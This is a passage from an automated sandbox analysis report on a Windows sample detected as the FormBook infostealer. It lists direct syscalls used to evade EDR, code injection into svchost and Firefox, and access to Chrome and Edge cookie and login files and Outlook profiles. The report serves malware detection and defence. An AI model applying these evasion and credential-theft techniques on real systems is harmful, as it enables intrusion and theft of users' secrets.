                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]2_2_038DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]2_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]2_2_038C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]2_2_038649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]2_2_038FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]2_2_038BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]2_2_038BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]2_2_038B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]2_2_038C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]2_2_038B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]2_2_03904940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]2_2_038BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]2_2_03830887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]2_2_038BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]2_2_0385E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]2_2_039008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]2_2_038FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]2_2_038BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov ecx, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_005180A9
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004EA155
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004EA124 SetUnhandledExceptionFilter,0_2_004EA124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RmClient.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\RmClient.exeThread register set: target process: 6528Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\RmClient.exeThread APC queued: target process: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C38008Jump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005187B1 LogonUserW,0_2_005187B1
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_004C3B3A
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004C48D7
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00524C53 mouse_event,0_2_00524C53
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9MZZG92yMO.exe"Jump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00517CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00517CAF
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0051874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0051874B
                Source: 9MZZG92yMO.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: XBOIFKGKIWT.exe, 00000005.00000002.4011257873.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000000.2373107119.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522876453.0000000000F20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: 9MZZG92yMO.exe, XBOIFKGKIWT.exe, 00000005.00000002.4011257873.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000000.2373107119.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522876453.0000000000F20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: XBOIFKGKIWT.exe, 00000005.00000002.4011257873.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000000.2373107119.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522876453.0000000000F20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: XBOIFKGKIWT.exe, 00000005.00000002.4011257873.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000000.2373107119.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522876453.0000000000F20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004E862B cpuid 0_2_004E862B
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004F4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004F4E87
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00501E06 GetUserNameW,0_2_00501E06
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004F3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_004F3F3A
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004C49A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4014572631.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2454199303.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2454931273.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\RmClient.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: 9MZZG92yMO.exeBinary or memory string: WIN_81
                Source: 9MZZG92yMO.exeBinary or memory string: WIN_XP
                Source: 9MZZG92yMO.exeBinary or memory string: WIN_XPe
                Source: 9MZZG92yMO.exeBinary or memory string: WIN_VISTA
                Source: 9MZZG92yMO.exeBinary or memory string: WIN_7
                Source: 9MZZG92yMO.exeBinary or memory string: WIN_8
                Source: 9MZZG92yMO.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4014572631.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2454199303.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2454931273.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00536283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00536283
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00536747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00536747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
